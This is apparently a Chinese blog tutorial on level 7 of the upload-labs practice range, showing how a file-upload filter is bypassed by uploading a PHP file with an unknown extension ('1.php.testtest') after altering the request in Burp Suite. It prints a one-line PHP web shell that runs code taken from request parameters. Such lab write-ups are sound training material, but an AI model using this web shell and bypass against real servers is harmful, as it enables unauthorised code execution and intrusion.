upload-labs靶场未知后缀名解析漏洞

upload-labs靶场未知后缀名解析漏洞

版本影响:

phpstudy 版本:5.2.17

1 环境搭建

1.1 在线靶场下载,解压到phpstudy的www目录下,即可使用
复制代码
https://github.com/c0ny1/upload-labs
1.2 已启动:访问端口9000,端口自设,打开页面选择第七关
复制代码
http://192.168.225.194:9000/upload_labs/

2 漏洞复现

2.1 上传1.php文件,文件内容如下,显示上传错误,使用bp上传
复制代码
<?php @eval($_REQUEST[777]);phpinfo();?>
2.2 使用bp转发

修改php后缀和文件内容类型,进行转发,返回信息提示上传成功

访问不能执行

结论php可以上传,php的不能上传,做了黑白名单策略,验证使用白名单或者是黑名单,随便给个后缀testtest

上传1.php.testtest成功

相关推荐
w1wi几秒前
cve_2026_31431(Copy Fail)物联网设备万能提权漏洞
web安全·安全性测试
梧六柒4 分钟前
6-大小写绕过
网络安全
上海云盾第一敬业销售1 小时前
深度解析:CDN网络安全架构与实践
安全·web安全·架构
如君愿1 小时前
考研复习 Day 36 | 习题--计算机网络 第七章 网络安全(下)、数据结构 排序算法(下)
计算机网络·考研·web安全
X7x51 小时前
终端安全管理(ESM):企业安全的“数字神经中枢“
网络安全·网络攻击模型·安全威胁分析·安全架构·esm
古城小栈1 小时前
宝塔面板部署 ThinkPHP6 后端
php
幽络源小助理4 小时前
MacCMSPro版视频影视系统源码_全开源高可用视频平台解决方案
前端·php·php源码
梧六柒11 小时前
5-.点+空格+点绕过 || .user.ini绕过
网络安全
pencek16 小时前
HakcMyVM-Slackware
网络安全
TO_WebNow16 小时前
使用thinkPHP8.x 访问接口提示跨域
前端·php